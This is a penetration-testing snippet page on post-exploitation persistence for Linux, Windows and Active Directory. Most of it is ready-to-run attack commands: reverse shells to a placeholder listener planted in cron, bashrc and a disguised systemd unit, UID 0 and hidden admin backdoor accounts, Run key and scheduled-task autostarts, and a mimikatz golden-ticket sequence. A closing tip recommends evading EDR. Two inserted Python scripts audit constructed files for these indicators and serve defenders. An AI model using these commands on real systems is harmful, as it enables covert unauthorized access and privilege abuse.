---
title: "Persistence"
domain: security
subdomain: pentest
phase: 05-post-exploitation
type: snippet
tags: [persistence, backdoor, cron, registry, authorized-keys]
difficulty: advanced
status: stable
updated: "2025-05-10"
---
## Linux

### Authorized SSH key

```bash
# Generate a key pair on the attacker side
ssh-keygen -t ed25519 -f /tmp/backdoor -N ""

# Add the public key on the target
mkdir -p /home/{{USER}}/.ssh
echo "{{SSH_PUBLIC_KEY}}" >> /home/{{USER}}/.ssh/authorized_keys
chmod 600 /home/{{USER}}/.ssh/authorized_keys

# Persistent access
ssh -i /tmp/backdoor {{USER}}@{{TARGET}}
```

### Cron job backdoor

```bash
# Reverse shell every 5 minutes (system crontab, runs as root)
echo "*/5 * * * * root bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1" >> /etc/crontab

# Or via the user's own crontab
(crontab -l 2>/dev/null; echo "*/5 * * * * bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'") | crontab -
```

### Backdoor user

```bash
# Create a second UID 0 account (-o allows the duplicate UID)
useradd -o -u 0 -g 0 -s /bin/bash -d /root {{BACKDOOR_USER}}
echo "{{BACKDOOR_USER}}:{{BACKDOOR_PASS}}" | chpasswd

# Add to sudoers with no password prompt
echo "{{BACKDOOR_USER}} ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
```

### /etc/passwd modification

```bash
# Append a root account with the hash stored inline (generated by openssl passwd)
echo "{{BACKDOOR_USER}}:$(openssl passwd {{BACKDOOR_PASS}}):0:0::/root:/bin/bash" >> /etc/passwd
```

### Bashrc / Profile

```bash
# In ~/.bashrc or ~/.profile (runs at every interactive login)
echo "bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1" >> ~/.bashrc

# Quieter: backgrounded with nohup so the user's shell is not blocked
echo "nohup bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1 &" >> ~/.bashrc
```

### systemd service

```bash
cat > /etc/systemd/system/update-check.service << 'EOF'
[Unit]
Description=System Update Check

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'
Restart=always
RestartSec=60

[Install]
WantedBy=multi-user.target
EOF

systemctl enable update-check
systemctl start update-check
```
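Every Linux technique above leaves a trace in a small set of files: a second UID 0 entry or an inline hash in `/etc/passwd`, a reverse-shell one-liner in `/etc/crontab` or a unit file, an `authorized_keys` entry that is not in the approved baseline, and a `NOPASSWD` rule in `/etc/sudoers`. The following script is an added example (not part of this snippet page) that audits constructed copies of those files for exactly those indicators. The file contents, IP address, key blobs and the `BASELINE_KEYS` set are all constructed; on a real host you would feed the real files into the same functions.

```python
import re

# Constructed sample inputs (not captured from a real host)
PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysadm:x:0:0::/root:/bin/bash
svc_backup:$6$saltsalt$constructedhashvalue:0:0::/root:/bin/bash
"""
CRONTAB = """SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
"""
SYSTEMD_UNIT = """[Unit]
Description=System Update Check
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'
"""
AUTHORIZED_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKnownKey00000000000000 alice@laptop
command="/usr/bin/true",no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedUnknownKey0000000000 backup
"""
# Approved key blobs (constructed); in practice exported from configuration management
BASELINE_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKnownKey00000000000000"}
SUDOERS = """root ALL=(ALL:ALL) ALL
# %wheel ALL=(ALL) NOPASSWD: ALL
svc_backup ALL=(ALL) NOPASSWD:ALL
"""

CALLBACK_PATTERNS = [
    re.compile(r"/dev/tcp/"),       # bash's built-in TCP redirection
    re.compile(r"\bbash\s+-i\b"),   # interactive shell started from a non-interactive context
    re.compile(r"\bnc\b.*\s-e\s"),  # netcat handing a program its socket
]
# Key type followed by the base64 blob; options such as command= may precede the type
KEY_RE = re.compile(r"(?:^|\s)(ssh-[a-z0-9-]+|ecdsa-[a-z0-9-]+|sk-[a-z0-9@.-]+)\s+([A-Za-z0-9+/=]+)")


def find_uid0_accounts(passwd_text):
    """Return (user, reason) for entries that are root-equivalent but not 'root',
    or that carry a password hash inline instead of the usual 'x'."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "uid 0 but not root"))
        if pw not in ("x", "*", "!", "!!", ""):
            findings.append((user, "password hash stored in /etc/passwd"))
    return findings


def find_shell_callbacks(text, source):
    """Return (source, line) for lines that look like a reverse-shell one-liner."""
    return [(source, line.strip()) for line in text.splitlines()
            if any(p.search(line) for p in CALLBACK_PATTERNS)]


def find_unknown_keys(authorized_keys_text, baseline_blobs):
    """Return authorized_keys entries whose key blob is not in the approved set."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if m and m.group(2) not in baseline_blobs:
            unknown.append(line.strip())
    return unknown


def find_nopasswd_rules(sudoers_text):
    """Return active (uncommented) sudoers lines granting passwordless sudo."""
    return [l.strip() for l in sudoers_text.splitlines()
            if "NOPASSWD" in l and not l.lstrip().startswith("#")]


def audit_all():
    """Run every check over the constructed samples; returns {check: findings}."""
    return {
        "passwd": find_uid0_accounts(PASSWD),
        "crontab": find_shell_callbacks(CRONTAB, "/etc/crontab"),
        "systemd": find_shell_callbacks(SYSTEMD_UNIT, "update-check.service"),
        "ssh_keys": find_unknown_keys(AUTHORIZED_KEYS, BASELINE_KEYS),
        "sudoers": find_nopasswd_rules(SUDOERS),
    }


if __name__ == "__main__":
    for check, items in audit_all().items():
        for item in items:
            print(f"[{check}] {item}")
```

The key check compares blobs against a baseline rather than looking for "suspicious" comments, because the comment field is free text and is the first thing an intruder edits; the cron and systemd checks share one pattern list so that a new indicator only has to be added once.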

## Windows

### Registry Run key

```cmd
:: HKCU (current user)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Temp\shell.exe" /f

:: HKLM (all users, requires admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Updater" /t REG_SZ /d "C:\Temp\shell.exe" /f
```

### Scheduled task

```cmd
:: Every hour
schtasks /create /tn "WindowsUpdate" /tr "C:\Temp\shell.exe" /sc hourly /ru System /f

:: At system start
schtasks /create /tn "StartupTask" /tr "C:\Temp\shell.exe" /sc onstart /ru System /f
```

### Windows service

```cmd
sc create "WindowsHelper" binpath= "C:\Temp\shell.exe" start= auto
sc start "WindowsHelper"
```

### Local accounts

```cmd
net user {{BACKDOOR_USER}} {{BACKDOOR_PASS}} /add
net localgroup administrators {{BACKDOOR_USER}} /add

:: Hide the account from the logon screen
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v {{BACKDOOR_USER}} /t REG_DWORD /d 0 /f
```
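The Windows snippets above (Run keys, scheduled tasks, the `SpecialAccounts\UserList` hide trick) are all readable back with `reg query` and `schtasks /query /fo CSV /v`. The script below is an added example, not part of this page, that triages constructed text in the shape those commands print: it flags autostart commands and task actions whose binary lives in a temp or user-writable location, and lists accounts hidden from the logon screen. The registry output, CSV rows, task names and the `C:\Temp\shell.exe` path are constructed samples; the column names follow the verbose `schtasks` CSV output but only a subset is included.

```python
import csv
import io

# Constructed text in the shape `reg query` prints for a Run key (not real host output)
REG_RUN_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Updater    REG_SZ    C:\Temp\shell.exe
"""

# Constructed UserList values; a DWORD 0 hides that account from the logon screen
REG_USERLIST_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    svc_backup    REG_DWORD    0x0
"""

# Constructed rows in the shape of `schtasks /query /fo CSV /v` (subset of its columns)
SCHTASKS_CSV = r'''"TaskName","Task To Run","Run As User","Author"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM","Microsoft Corporation"
"\WindowsUpdate","C:\Temp\shell.exe","SYSTEM","WORKSTATION\alice"
'''

# Locations a legitimately installed autostart rarely lives in (lower-case substrings)
UNTRUSTED_PATH_MARKERS = (
    "c:\\temp\\", "\\windows\\temp\\", "\\appdata\\", "\\programdata\\",
    "%temp%", "\\users\\public\\", "\\downloads\\",
)


def parse_reg_query(output):
    """Return [(name, type, data)] from `reg query` output for a single key.
    Value lines are indented four spaces and use four-space separators."""
    values = []
    for line in output.splitlines():
        if not line.startswith("    "):
            continue  # key header or blank line
        parts = line.strip().split("    ")
        if len(parts) == 3 and parts[1].startswith("REG_"):
            values.append((parts[0], parts[1], parts[2]))
    return values


def command_is_suspicious(command):
    """True when the command's path points at a temp or user-writable location."""
    c = command.strip().strip('"').lower()
    return any(marker in c for marker in UNTRUSTED_PATH_MARKERS)


def suspicious_run_entries(reg_output):
    """Run-key values whose command resolves to an untrusted location."""
    return [(name, data) for name, _, data in parse_reg_query(reg_output)
            if command_is_suspicious(data)]


def suspicious_tasks(csv_text):
    """Tasks whose action lives in an untrusted path; the run-as user is returned
    alongside because SYSTEM-level tasks are the ones to look at first."""
    rows = csv.DictReader(io.StringIO(csv_text))
    return [(r["TaskName"], r["Task To Run"], r["Run As User"]) for r in rows
            if command_is_suspicious(r["Task To Run"])]


def hidden_accounts(reg_output):
    """Accounts whose UserList value is 0 (hidden from the logon screen)."""
    return [name for name, vtype, data in parse_reg_query(reg_output)
            if vtype == "REG_DWORD" and int(data, 16) == 0]


def triage():
    """Run all three checks over the constructed samples."""
    return {
        "run_keys": suspicious_run_entries(REG_RUN_OUTPUT),
        "tasks": suspicious_tasks(SCHTASKS_CSV),
        "hidden_accounts": hidden_accounts(REG_USERLIST_OUTPUT),
    }


if __name__ == "__main__":
    for check, items in triage().items():
        print(check, items)
```

Path-based flagging is deliberately narrow: it will not catch a binary dropped under `C:\Windows\System32`, so in practice it is paired with signature and hash checks, but it does catch the exact pattern these snippets produce and stays quiet on the stock Microsoft entries.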

### Golden Ticket (Active Directory)

```text
# In mimikatz, dump the KRBTGT hash
lsadump::dcsync /user:krbtgt

# Forge the golden ticket
kerberos::golden /user:Administrator /domain:{{DOMAIN}} /sid:{{DOMAIN_SID}} /krbtgt:{{KRBTGT_HASH}} /ticket:golden.kirbi

# Inject the ticket into the current session (pass-the-ticket)
kerberos::ptt golden.kirbi
```

<Danger>
Backdoors are detectable by modern EDR. Prefer living-off-the-land techniques (LOLBins) to stay discreet.
</Danger>
